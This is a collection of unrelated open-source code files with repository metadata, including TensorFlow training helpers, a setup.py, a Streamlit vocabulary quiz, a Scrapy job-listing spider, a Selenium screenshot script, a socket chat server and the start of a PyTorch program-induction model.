run_config = tf.contrib.learn.RunConfig(
model_dir=output_dir,
master=FLAGS.master,
gpu_memory_fraction=FLAGS.worker_gpu_memory_fraction,
session_config=session_config(),
keep_checkpoint_max=FLAGS.keep_checkpoint_max,
keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours,
save_checkpoints_secs=FLAGS.save_checkpoints_secs)
return run_config
def run(data_dir, model, output_dir, train_steps, eval_steps, schedule):
"""Runs an Estimator locally or distributed.
Args:
data_dir: The directory the data can be found in.
model: The name of the model to use.
output_dir: The directory to store outputs in.
train_steps: The number of steps to run training for.
eval_steps: The number of steps to run evaluation for.
schedule: (str) The schedule to run. The value here must
be the name of one of Experiment's methods.
"""
exp_fn = make_experiment_fn(
data_dir=data_dir,
model_name=model,
train_steps=train_steps,
eval_steps=eval_steps)
# Create hparams and run_config
run_config = create_run_config(output_dir)
hparams = create_hparams(
FLAGS.hparams_set, data_dir, passed_hparams=FLAGS.hparams)
if is_chief():
save_metadata(output_dir, hparams)
learn_runner.run(
experiment_fn=exp_fn,
schedule=schedule,
run_config=run_config,
hparams=hparams)
def validate_flags():
"""Validate command line flags."""
if not FLAGS.model:
raise ValueError("Must specify a model with --model.")
if not FLAGS.problems:
raise ValueError("Must specify a set of problems with --problems.")
if not (FLAGS.hparams_set or FLAGS.hparams_range):
raise ValueError("Must specify either --hparams_set or --hparams_range.")
if not FLAGS.schedule:
raise ValueError("Must specify --schedule.")
if not FLAGS.output_dir:
FLAGS.output_dir = "/tmp/tensor2tensor"
tf.logging.warning("It is strongly recommended to specify --output_dir. "
"Using default output_dir=%s.", FLAGS.output_dir)
if not FLAGS.data_dir:
raise ValueError("Must specify --data_dir.")
def is_chief():
schedules = ["train", "train_and_evaluate"]
return FLAGS.worker_id == 0 and FLAGS.schedule in schedules
def session_config():
"""The TensorFlow Session config to use."""
graph_options = tf.GraphOptions(optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=False))
if FLAGS.experimental_optimize_placement:
rewrite_options = tf.RewriterConfig(optimize_tensor_layout=True)
rewrite_options.optimizers.append("pruning")
rewrite_options.optimizers.append("constfold")
rewrite_options.optimizers.append("layout")
graph_options = tf.GraphOptions(
rewrite_options=rewrite_options, infer_shapes=True)
gpu_options = tf.GPUOptions(
per_process_gpu_memory_fraction=FLAGS.worker_gpu_memory_fraction)
config = tf.ConfigProto(
allow_soft_placement=True,
graph_options=graph_options,
gpu_options=gpu_options,
log_device_placement=FLAGS.log_device_placement)
return config
|
[
"rsepassi@google.com"
] |
rsepassi@google.com
|
1eb49e531bba0a61323ca155c49e850f6ba1501b
|
17aca286d586dd7f4b7563255781a9d5d5ea1c68
|
/setup.py
|
8a27af08618f3e479afaa67dcd2dca54aaf4f7f0
|
[
"Apache-2.0"
] |
permissive
|
wolcomm/napalm-exaros
|
894f4a05b7e862195d7d54b5f5d7ff6e43885021
|
dc89ac9844761739d805fdfea8eeb478cdaa0438
|
refs/heads/master
| 2021-01-19T17:49:00.434687
| 2017-08-28T12:52:24
| 2017-08-28T12:52:24
| 101,086,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 973
|
py
|
"""setup.py file."""
import uuid
from pip.req import parse_requirements
from setuptools import find_packages, setup
__author__ = 'Ben Maddison <benm@workonline.co.za>'
install_reqs = parse_requirements('requirements.txt', session=uuid.uuid1())
reqs = [str(ir.req) for ir in install_reqs]
description = "Network Automation and Programmability Abstraction Layer with \
Multivendor support"
setup(
name="napalm-exaros",
version="0.1.0",
packages=find_packages(),
author="Ben Maddison",
author_email="benm@workonline.co.za",
description=description,
classifiers=[
'Topic :: Utilities',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS',
],
url="https://github.com/wolcomm/napalm-exaros",
include_package_data=True,
install_requires=reqs,
)
|
[
"benm@workonline.co.za"
] |
benm@workonline.co.za
|
4808b9b25341398fa95d898a73ff184df234b880
|
64072351a4f854652975718a18bf403cc3aae6cb
|
/flash.py
|
fa13791f4f1ba9ae3b3d8ec708a67f5a4b7ed2cc
|
[] |
no_license
|
SHOTA-Nishimu/Nishimu-Streamlit
|
d818e44efb982363e6ca774ff830f3733914fc91
|
8f8c3ec2a31d28a224c47d5c161fd3c452b6ef3a
|
refs/heads/master
| 2023-03-16T21:01:06.486108
| 2021-03-09T01:53:33
| 2021-03-09T01:53:33
| 345,011,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,342
|
py
|
import re
import random
import streamlit as st
import numpy as np
source = 'C:/Users/chisa/desktop/verb01.txt'
with open(source, encoding='utf-8') as f:
d = f.read()
sentence = re.findall('[一-𥻘あ-ん()=~[\]、。「」々・……]+',d)
#print(d)
source02 ='C:/Users/chisa/desktop/verb01answer.txt'
with open(source02, encoding='utf-8') as f2:
d2 = f2.read()
answer = re.findall('[一-𥻘あ-ん()=~[\]、。「」々・……]+',d2)
#print(d2)
word_dict = dict(zip(sentence, answer))
#print(word_dict)
st.title('古文単語練習')
"""
### 次の( )の単語の意味を答えなさい。
"""
question_num=1
for q in range(question_num):
random_index=np.random.randint(low=0, high=len(sentence),size=question_num )
question_word = sentence[random_index[q]]
correct_answer = word_dict[question_word]
c_answer = answer[random_index[q]]
st.header(question_word)
answer_copy= answer.copy()
answer_copy.remove(correct_answer)
wrong_answers = random.sample(answer_copy, 3)
answer_options = [correct_answer]+ wrong_answers
random.shuffle(answer_options)
st.subheader(answer_options)
expander = st.beta_expander('答えを表示する')
expander.header(c_answer)
button =st.button('次の問題を表示する')
|
[
"nisimuras@kyoto-ryoyo.ed.jp"
] |
nisimuras@kyoto-ryoyo.ed.jp
|
f441f140ccab41b7f21ad161ecdefb815bd40c96
|
31c9d69a2d0abe436c0ff31c059d2ffb0ebb318a
|
/pyiaga2002/bin/iaga2mscan.py
|
fbafed8ee0507d0b851e82248f9076392ee5e8b3
|
[] |
no_license
|
CharlesBlais/pyiaga2002
|
d29a934348be0be42da39a0293112fac7e886e10
|
39dfc86c9af51f878bf84b0ecefed1f6bd79b77b
|
refs/heads/master
| 2023-03-31T09:28:11.100948
| 2021-04-09T18:37:07
| 2021-04-09T18:37:07
| 356,368,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,791
|
py
|
"""
.. codeauthor:: Charles Blais
"""
import os
import argparse
import logging
import pyiaga2002.iaga2002 as iaga2002
import pyiaga2002.mscan as mscan
def main():
"""
Convert IAGA2002 file to miniSeed for MSCAN ringserver.
.. see:: iaga2mseed.py
    This extends the conversion by updating only the differences of files
found in a MSEEDSCAN directory for the ringserver. The content
of the directory per observatory is read, merged, and only the differences
are added.
    We will use a simplified file structure for this (a BUD-like structure)
<dir>/<NET>/<STA>/NET.STA.LOC.CHAN.YEAR.DAY.TIMESTAMP
Example:
<dir>/C2/OTT/C2.OTT.R0.UFX.2021.065.1617968213
where timestamp is the submit time
:author: Charles Blais
"""
parser = argparse.ArgumentParser(
description='Read IAGA2002 file as miniSeed')
parser.add_argument(
'filename',
help='IAGA2002 file to convert')
parser.add_argument(
'--directory',
default=os.getcwd(),
help=f'Output file (default: {os.getcwd()})')
parser.add_argument(
'--network',
default='XX',
help='Network code (default: XX)')
parser.add_argument(
'-v', '--verbose',
action='store_true',
help='Verbosity')
args = parser.parse_args()
# Set logging level
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)s \
%(module)s %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO if args.verbose else logging.WARNING)
stream = iaga2002.read(args.filename)
# Add network code to all traces and update
for trace in stream:
trace.stats.network = args.network
mscan.update(args.directory, trace)
|
[
"charles.blais@canada.ca"
] |
charles.blais@canada.ca
|
24f58281e612f2ee14253e77c4ec908e4bfa1fd3
|
ff2b590018847ab1b4b46fc4eb49c9cb295e68e6
|
/python/basic_data_types/hr_list_comprehensions.py
|
066b605fe9fd784ee691fc84d390cb3491fc1eb7
|
[] |
no_license
|
iamacarrot92/hackerrank_challenges
|
2fc1ad321791e1cd34952014a6c115725e31ca67
|
65a00e0a7fa775a323debdf02a0bd9d5a2686a81
|
refs/heads/main
| 2023-03-06T07:32:20.892879
| 2021-02-08T20:21:04
| 2021-02-08T20:21:04
| 336,607,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
def method_one(x, y, z, n):
rand_grid = []
for i in range(x + 1):
for j in range(y + 1):
for k in range(z + 1):
if (i + j + k) != n:
rand_grid.append([i,j,k])
return rand_grid
def method_two(x, y, z, n):
return [[i, j, k] for i in range(x + 1) for j in range(y + 1) for k in range(z + 1) if sum([i, j, k]) != n]
x = int(input())
y = int(input())
z = int(input())
n = int(input())
print(method_one(x, y, z, n))
print(method_two(x, y, z, n))
|
[
"limbu_101@outlook.com"
] |
limbu_101@outlook.com
|
f2c6e47f8fa5fc9e9b6812e1ce70fca376db9a3f
|
897554d1ffe398f701df82cdf390bf185f97bf20
|
/django-stubs/contrib/gis/sitemaps/__init__.pyi
|
adf328291f3fbe04961f9532a8505eccce8cb58d
|
[
"MIT"
] |
permissive
|
maximmasiutin/django-stubs
|
c0a7bac533b03c81704755c5e4a8eff9a178010d
|
55366fbf087522f860aa242c200f87b36c6c24a7
|
refs/heads/master
| 2023-04-15T09:47:51.980794
| 2021-04-20T12:18:22
| 2021-04-20T16:07:45
| 359,802,871
| 1
| 0
|
MIT
| 2021-04-20T12:12:03
| 2021-04-20T12:12:03
| null |
UTF-8
|
Python
| false
| false
| 95
|
pyi
|
from django.contrib.gis.sitemaps.kml import KMLSitemap as KMLSitemap, KMZSitemap as KMZSitemap
|
[
"noreply@github.com"
] |
maximmasiutin.noreply@github.com
|
3c0544ff3ef7a7c59dbec704c2ef95a890e79a48
|
b60baecf17c616b823b10c9b2102d3a0084dd897
|
/gante_project_euler/solutions/problem_007.py
|
a95e86c799b73ca6aa017523bd08ca554e2fec32
|
[
"MIT"
] |
permissive
|
gante/project_euler
|
19e03ca76372c816506baf577d363cb74f11afc9
|
9b5e780259e28d4f4d66cb4c954623f81aeaa5af
|
refs/heads/master
| 2022-12-09T22:26:10.407925
| 2020-08-29T16:13:54
| 2020-08-29T16:13:54
| 277,366,880
| 2
| 0
|
MIT
| 2020-08-09T21:03:46
| 2020-07-05T19:10:54
|
Python
|
UTF-8
|
Python
| false
| false
| 848
|
py
|
""" Solution for Project Euler's problem #7 """
import os
import time
from datetime import timedelta
from gante_project_euler.math.prime import get_all_primes
def get_solution():
""" Solves the problem and returns the answer.
"""
return get_all_primes(n_primes=10001)[-1]
if __name__ == "__main__":
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
start = time.time()
solution = get_solution()
end = time.time()
print("Solution: {}".format(solution))
print("Elapsed time (w/compile time): {} (HH:MM:SS.us)".format(timedelta(seconds=end-start)))
    # The code is compiled the first time it runs. This second run uses the cached compilation.
start = time.time()
_ = get_solution()
end = time.time()
print("Elapsed time (wo/compile time): {} (HH:MM:SS.us)".format(timedelta(seconds=end-start)))
|
[
"joaofranciscocardosogante@gmail.com"
] |
joaofranciscocardosogante@gmail.com
|
b8c8e8697cb00b856a2bce08f7028a0be9c31e4a
|
5e3db2bd0227ec1a761ee0f3c7100fb2aca8e5fb
|
/LeetCodeSolutions/stampingseq.py
|
608c2abb0a5d02a35e83f4dbaa46a9e961524c55
|
[] |
no_license
|
Raunak173/hacktoberfest
|
e09eaff87c6e2eb12935c03f404c17e20146f9a8
|
1d21f9a314bfb05674fa793a2a80eedceeca6eda
|
refs/heads/main
| 2023-08-16T04:05:09.908878
| 2021-10-14T09:58:14
| 2021-10-14T09:58:14
| 417,076,974
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,744
|
py
|
import collections


class Solution(object):
def movesToStamp(self, stamp, target):
M, N = len(stamp), len(target)
queue = collections.deque()
done = [False] * N
ans = []
A = []
for i in xrange(N - M + 1):
# For each window [i, i+M),
# A[i] will contain info on what needs to change
# before we can reverse stamp at i.
made, todo = set(), set()
for j, c in enumerate(stamp):
a = target[i+j]
if a == c:
made.add(i+j)
else:
todo.add(i+j)
A.append((made, todo))
# If we can reverse stamp at i immediately,
# enqueue letters from this window.
if not todo:
ans.append(i)
for j in xrange(i, i + len(stamp)):
if not done[j]:
queue.append(j)
done[j] = True
# For each enqueued letter,
while queue:
i = queue.popleft()
# For each window that is potentially affected,
# j: start of window
for j in xrange(max(0, i-M+1), min(N-M, i)+1):
if i in A[j][1]: # This window is affected
A[j][1].discard(i) # Remove it from todo list of this window
if not A[j][1]: # Todo list of this window is empty
ans.append(j)
for m in A[j][0]: # For each letter to potentially enqueue,
if not done[m]:
queue.append(m)
done[m] = True
return ans[::-1] if all(done) else []
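# Illustrative walk-through (added comment, not part of the original solution):
# with stamp = "abc" and target = "ababc", only the window starting at index 2
# ("abc") has an empty todo set, so it is reverse-stamped first; clearing its
# letters then shrinks the todo sets of the overlapping windows at indices 0
# and 1 until they empty out and are appended to ans in turn.  The method
# finally returns ans reversed, i.e. the order in which stamps would be applied
# going forward.  This is a hand-traced example, not captured program output.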
|
[
"noreply@github.com"
] |
Raunak173.noreply@github.com
|
7670946754ffd4334370da7ccd28a8ed5e95e2dd
|
2b1a4cc1b97042399445baf2507a8485c04b1d70
|
/main.py
|
a9c5936090546db617a13c901eefdcf7c8169d65
|
[] |
no_license
|
yuvalpress/automated-servers-installation
|
ac9c59d9749246c9ce37d9423588486b71cc4eec
|
1573d776976b892846ec7c3d72bbf9099d103593
|
refs/heads/master
| 2023-06-19T18:10:26.154417
| 2021-07-18T13:30:38
| 2021-07-18T13:30:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,175
|
py
|
import sys
import subprocess
import asyncio
from Scripts.iDrac_Scripts import pre_iDrac as pre
from Scripts.iDrac_Scripts import iDrac_IP_Address as set_ip
from Scripts.iDrac_Scripts import iDrac_Rest_Of_Settings as idrac_settings
from Scripts.iDrac_Scripts import iDrac_Raids as set_raid
from Scripts.iDrac_Scripts import iDrac_Configuration as idrac_stracture
from Scripts.iDrac_Scripts import post_kafka_worker as post_storage
def config(iDracs, ex):
print("Creating iDrac objects")
idracs_list = []
for server in iDracs:
# Create iDrac object
iDrac = idrac_stracture.iDracConf(server["name"], server["tmp_ip"], server["ip_address"], server["subnet"],
server["gateway"],
server["timezone"], server["vconsole"], server["boot_mode"], server["vdisks"],
server["pdisks"], server["IP_Check"], server["Raid1_Check"],
server["Raid2_Check"])
idracs_list.append(iDrac)
print("Done!\n")
print("Starting pre stage for all servers..")
try:
pre.do_pre(ex)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Starting IP Addresses changing stage..")
try:
set_ip.ip(idracs_list)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Starting general settings stage..")
try:
idrac_settings.settings(idracs_list)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Starting Raids creation stage..")
try:
set_raid.do_raids(idracs_list)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Creating ISO Costumed images..")
try:
path = sys.argv[1]
print(path)
sub = subprocess.Popen(
["C:\\Users\\admin\\Desktop\\Automated Configuration\\Scripts\\ISO_Scripts\\call_bash_environment.cmd",
path], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print(str(sub.stdout.read()), "\n")
print("error: ", sub.stderr.read())
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print("Mounting ISO Costumed images..")
try:
for server in idracs_list:
sub = subprocess.Popen(["powershell",
"& \"C:\\Users\\admin\\Desktop\\Automated "
"Configuration\\Scripts\\ISO_Scripts\\Bash Scripts\\mountISO.ps1\" {}.iso {}".format(
server.name, server.ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if "ERROR: Unable to perform requested operation." in str(sub.stdout.read()).strip("b'").replace("\\r\\n",
"").replace(
"\\r", ""):
print(idrac_stracture.colors.FAIL + "You'll have to mount the ISO yourself because the RACADM "
"remoteimage module doesn't work on "
"iDrac {}".format(server.ip) + idrac_stracture.colors.ENDC)
print("Done!\n")
except Exception as err:
print("Failed with the following error: %s\n" % err)
print(idrac_stracture.colors.OKPURPLE +
"Don't close the script window! Making sure Operating Systems were installed successfully and initiating "
"post "
"installation configuration process." + idrac_stracture.colors.ENDC)
try:
asyncio.run(post_storage.post(ex))
except Exception as err:
print("Failed with the following error: ", err)
if __name__ == "__main__":
print("Analysing Excel file..")
iDracs = idrac_stracture.readExcel(sys.argv[1]).read()
print("Done!")
config(iDracs, sys.argv[1])
|
[
"yuvalpress@gmail.com"
] |
yuvalpress@gmail.com
|
e834abee33916c4a68a8db91f983360ca7551559
|
298a9313f2fac52cfd2529fad036c91c683bc93d
|
/projects/admin.py
|
a535a79739d179874406099d5c927f10a4f752cd
|
[] |
no_license
|
callump5/portfolio_site
|
d91b32a143810574ba00452ed4da2d4862616f6a
|
f0d5e2a07df8e9660ef138fb06becc23302c081f
|
refs/heads/master
| 2020-03-18T07:28:48.217171
| 2018-08-09T19:25:41
| 2018-08-09T19:25:41
| 134,455,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from models import *
# Register your models here.
admin.site.register(Project)
admin.site.register(ProjectGoal)
|
[
"clpullinger@gmail.com"
] |
clpullinger@gmail.com
|
256a0f567c4cf82d318538df5cd13c894da34a4a
|
7de0c43668ab98aba5cfee1db88a435dc667e03f
|
/Exercícios/menor_nome.py
|
8e5b5eb048207b2e12d495c123be02250e40e912
|
[] |
no_license
|
lldenisll/learn_python
|
b9704b86e1de548268da73beb776d33222beb06f
|
b0d0e36ea54bfc09bfd3310999f7e19f8bb44405
|
refs/heads/master
| 2022-09-21T04:39:59.709520
| 2020-06-05T22:29:32
| 2020-06-05T22:29:32
| 269,099,149
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
# def sum_letters(string):
#letters=0
#for i in string:
# if i.isalpha():
# letters += 1
# else:
# pass
#return letters  # DID NOT END UP NEEDING THIS
def menor_nome(nomes):
x=min(listafinal(nomes), key=len)
y = ''.join((x))
return(y.capitalize())
def ignora(list):
newlist=([])
for i in list:
newlist.append(i.split())
return newlist
def listafinal(list):
listafinal=[]
lista=ignora(list)
i=0
while i < len(lista):
x= ''.join(lista[i])
listafinal.append(x)
i=i+1
return listafinal
menor_nome(['maria', 'josé', 'PAULO', 'Catarina'])
# should return 'José'
menor_nome(['maria', ' josé ', ' PAULO', 'Catarina '])
# should return 'José'
menor_nome(['Bárbara', 'JOSÉ ', 'Bill'])
# should return José
menor_nome(['LU ', ' josé ', 'PAULO', 'Catarina'])
menor_nome(['zé', ' lu', 'fê'])
|
[
"namorado@TFGcos-MacBook-Pro.local"
] |
namorado@TFGcos-MacBook-Pro.local
|
4dea393a8b6eaccd3884e191a1b91d88697dd170
|
98f80f5479def187ef2c349ed5e67fa2165b7290
|
/Tugas4/server_thread_chat.py
|
cf0ddfb1898bdc9625870bb98129e2f74990f0d8
|
[] |
no_license
|
farizardin/fp-network-programming
|
2f61e02994e1c44692837bdc30821c5f3eaf9c5e
|
053876a711be1d5cce55ccd80ca51af209548045
|
refs/heads/master
| 2020-05-20T10:41:17.492612
| 2019-05-23T12:22:37
| 2019-05-23T12:22:37
| 185,530,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,343
|
py
|
from socket import *
import socket
import threading
import thread
import time
import sys
import json
from chat import Chat
chatserver = Chat()
class ProcessTheClient(threading.Thread):
def __init__(self,connection,address):
self.connection = connection
self.address = address
threading.Thread.__init__(self)
def run(self):
while True:
data = self.connection.recv(1024)
if data:
self.connection.sendall("{}\r\n\r\n" . format(json.dumps(chatserver.proses(data,self.connection))))
else:
break
self.connection.close()
class Server(threading.Thread):
def __init__(self):
self.the_clients = []
self.my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
threading.Thread.__init__(self)
def run(self):
self.my_socket.bind(('0.0.0.0',8887))
self.my_socket.listen(1)
while True:
self.connection, self.client_address = self.my_socket.accept()
print >> sys.stderr, 'connection from', self.client_address
clt = ProcessTheClient(self.connection, self.client_address)
clt.start()
self.the_clients.append(clt)
def main():
svr = Server()
svr.start()
if __name__=="__main__":
main()
|
[
"fariz.ardin@gmail.com"
] |
fariz.ardin@gmail.com
|
3d32562b9c9b3bd68304cc5d69ec67750c07c849
|
737f4d8ff08f4d88a1d26e50e8a6e147da98da1c
|
/dynamic_scraping/dynamic_test.py
|
7f340b1316aae73585ed2f684fce2a3eeda63dfc
|
[
"MIT"
] |
permissive
|
joaoDragado/web_scraping
|
7016ebd3ad2a2c225fbe16596ea4c28c2178f513
|
2cbc48b81785b5f2b3c5f34b53b2e56b9df25216
|
refs/heads/master
| 2021-01-20T19:05:20.241353
| 2019-04-09T17:46:46
| 2019-04-09T17:46:46
| 60,857,079
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,244
|
py
|
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
# instantiate a chrome options object so you can set the size and headless preference
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--window-size=1920x1080')
chrome_options.add_argument("--disable-notifications")
# directory of chrome driver
chrome_driver = '/archive/Studies/webdrivers/chromedriver'
# initialize/launch chrome
driver = webdriver.Chrome(chrome_options=chrome_options, executable_path=chrome_driver)
# go to Reddit
driver.get('https://www.reddit.com/')
# launch the user dropdown menu (top right)
driver.find_element_by_id('USER_DROPDOWN_ID').click()
#WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.ID, 'USER_DROPDOWN_ID'))).click()
# select night mode
driver.find_element_by_class_name('egZVll').click()
#WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.CLASS_NAME, 'egZVll'))).click()
# capture the screen
driver.get_screenshot_as_file('capture.png')
|
[
"dubmecoco@yahoo.com"
] |
dubmecoco@yahoo.com
|
d53e0cec89d4c41edbc1c5d2e5701117141afbaa
|
890c8b8e90e516a5a3880eca9b2d217662fe7d84
|
/armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_32_bit/thumb_coprocessor_advanced_simd_and_floating_point_instructions/mrc_t2.py
|
24351564450f9932155c2a5dc2732bd0fd535b06
|
[
"MIT"
] |
permissive
|
doronz88/armulator
|
b864135996f876c7857b79a314d4aa06cc19c549
|
0294feac2785c8947e5943ac0c34f941ee4b5fff
|
refs/heads/master
| 2022-11-05T08:14:42.405335
| 2020-06-18T23:53:17
| 2020-06-18T23:53:17
| 273,363,061
| 2
| 0
| null | 2020-06-18T23:51:03
| 2020-06-18T23:51:02
| null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
from armulator.armv6.opcodes.abstract_opcodes.mrc import Mrc
from armulator.armv6.opcodes.opcode import Opcode
from armulator.armv6.arm_exceptions import UndefinedInstructionException
class MrcT2(Mrc, Opcode):
def __init__(self, instruction, cp, t):
Opcode.__init__(self, instruction)
Mrc.__init__(self, cp, t)
def is_pc_changing_opcode(self):
return False
@staticmethod
def from_bitarray(instr, processor):
coproc = instr[20:24]
rt = instr[16:20]
if coproc[0:3] == "0b101":
raise UndefinedInstructionException()
elif rt.uint == 13:
print "unpredictable"
else:
return MrcT2(instr, **{"cp": coproc.uint, "t": rt.uint})
|
[
"matan1008@gmail.com"
] |
matan1008@gmail.com
|
075bbee43f1e72c7c79b99c707655a5804d0ba32
|
4296cb5b97a69382d1fe6b73753a2ffcd1d154c5
|
/abc/C/198.py
|
db0b3658e5eefde55e745e4ef8b00d3c2d351bc3
|
[] |
no_license
|
tokuD/atcoder
|
a199a5fe92be54d0b66ceaf6158116984f52cd01
|
a95a0380af129109fcf48eb1d4994bbb52925320
|
refs/heads/master
| 2023-08-28T10:28:55.763895
| 2021-11-13T15:49:38
| 2021-11-13T15:49:38
| 371,675,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
import math
R,X,Y = map(int, input().split())
dis = math.sqrt(X**2+Y**2)
ans = int(dis//R)
if dis % R != 0:
ans += 1
if ans == 1:
ans += 1
print(ans)
|
[
"megumu112851@gmail.com"
] |
megumu112851@gmail.com
|
2c7627e66788f1ff44c324f5799fc2d2f4f987d2
|
de0e09b1642472458dcd392484eeda5f490841ca
|
/HelloScrapy/spiders/zhilian.py
|
f2a8d9976d4e6bb1531689711fcbd57fa25aa328
|
[] |
no_license
|
lesliebeijing/spider
|
e18d20821af732800e7cf7fdc117cd5b950c9e20
|
38dfd3edc26540f8ba17cfbaf2db3516f97c792b
|
refs/heads/master
| 2021-01-21T09:33:32.599900
| 2017-07-05T07:15:23
| 2017-07-05T07:15:23
| 91,656,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,667
|
py
|
import scrapy
from ..items import CompanyItem
class ZhilianSpider(scrapy.Spider):
name = "zhilian"
search_keys = ['android', 'ios', 'java', '.net', 'c', 'c++', 'php', 'unity', 'unreal', 'linux', 'python',
'测试', '嵌入式', '前端', '大数据', '运维', '机器学习']
def start_requests(self):
for key in self.search_keys:
url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?jl=青岛&kw=%s&p=1&isadv=0' % key
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
companies = response.css('table.newlist')
for company in companies:
name = company.css('td.gsmc a::text').extract_first()
region = company.css('td.gzdd::text').extract_first()
detail_url = company.css('td.gsmc a::attr(href)').extract_first()
if detail_url and 'special.zhaopin.com' not in detail_url:
yield scrapy.Request(detail_url, callback=self.parse_detail, meta={'name': name, 'region': region})
next_page = response.xpath('//li[@class="pagesDown-pos"]/a/@href').extract_first()
if next_page:
yield scrapy.Request(next_page, callback=self.parse)
def parse_detail(self, response):
name = response.meta.get('name')
region = response.meta.get('region')
table_desc = response.css('table.comTinyDes')
items = table_desc.css('tr td span')
nature = ''
size = ''
address = ''
web_site = ''
if len(items) == 8:
            nature = items[1].css('::text').extract_first()  # nature (ownership type)
            size = items[3].css('::text').extract_first()  # company size
            address = items[7].css('::text').extract_first()  # address
elif len(items) == 10:
            nature = items[1].css('::text').extract_first()  # nature (ownership type)
            size = items[3].css('::text').extract_first()  # company size
            web_site = items[5].css('a::attr(href)').extract_first()  # website
            address = items[9].css('::text').extract_first()  # address
if web_site and web_site == 'http://null':
web_site = ''
introduction = ''
        intros = response.xpath('//div[@class="company-content"]//*').extract()  # company introduction
for intro in intros:
introduction += intro.strip()
company_item = CompanyItem({
'name': name,
'region': region,
'nature': nature,
'size': size,
'web_site': web_site,
'address': address,
'introduction': introduction
})
yield company_item
|
[
"fanglin@chinayouthgroup.com"
] |
fanglin@chinayouthgroup.com
|
42a8404053a7918bbbb30fb58779e7abde8170b9
|
0388a394341ec6fa13d3899aa9705ae8a631b5db
|
/code/NPI/pytorch/noisy_WikiData_CSQA/model_vanilla.py
|
e6e3e80425c4d9908b9bf841532e6991b675f14b
|
[] |
no_license
|
CIPITR/SSRP
|
06f08c17b5a1cd8139cf55b27638a557c073ce18
|
8a4b46a6e068e5bff78c1f051380f36496a5cce8
|
refs/heads/master
| 2022-12-13T05:55:54.564735
| 2019-05-27T04:58:07
| 2019-05-27T04:58:07
| 188,771,043
| 10
| 4
| null | 2022-11-22T02:56:56
| 2019-05-27T04:31:23
|
Python
|
UTF-8
|
Python
| false
| false
| 102,229
|
py
|
from collections import defaultdict
import numpy as np
import torch
import torch.nn as nn
import math
class NPI(nn.Module):
def __init__(self, params, none_argtype_index, num_argtypes, num_programs,
max_arguments, rel_index, type_index,
rel_embedding, type_embedding, vocab_embed,
program_to_argtype_table, program_to_targettype_table):
super(NPI, self).__init__()
self.seed = 1
np.random.seed(self.seed)
torch.manual_seed(self.seed)
self.params = params
self.num_timesteps = params['num_timesteps']
self.max_num_phase_1_steps = self.num_timesteps / 2
self.state_dim = params['state_dim']
self.batch_size = params['batch_size']
self.prog_embed_dim = params['prog_embed_dim']
self.argtype_embed_dim = params['argtype_embed_dim']
self.var_embed_dim = params['var_embed_dim']
self.npi_core_dim = params['npi_core_dim']
self.env_dim = params['env_dim']
self.hidden_dim = params['hidden_dim']
self.empty_argtype_id = none_argtype_index
self.sample_with = params["sample_with"]
self.num_argtypes = num_argtypes
self.num_progs = num_programs
self.max_arguments = max_arguments
self.max_num_var = params['max_num_var']
self.prog_key_dim = params['prog_key_dim']
self.var_key_dim = params['var_key_dim']
if params['use_key_as_onehot']:
self.use_key_as_onehot = True
self.var_key_dim = self.num_argtypes + self.max_num_var
self.prog_key_dim = self.num_progs
else:
self.use_key_as_onehot = False
self.max_len = params['max_len']
self.wikidata_embed_dim = params['wikidata_embed_dim']
self.text_embed_dim = params['text_embed_dim']
self.cell_dim = params['cell_dim']
self.eps = 1e-20
self.learning_rate = params['learning_rate']
self.beam_size = params['beam_size']
self.num_programs_to_sample = params['num_programs_to_sample']
self.num_variables_to_sample = params['num_variables_to_sample']
self.num_actions = self.num_variables_to_sample * self.num_programs_to_sample
self.temperature = 0.1
self.terminate_threshold = 0.7
self.phase_change_threshold = 0.2
self.bias_to_gold_type_threshold = 0.3
self.rel_embedding = None
self.query_rel_atten = None
# program_table contains two parameters "Program_Embedding" and "Program_Keys".
# Program_Keys is of dimension num_programs x prog_key_dim.
# Program_Embedding is of dimension num_programs x prog_embed_dim
self.program_embedding = None
self.program_keys = None
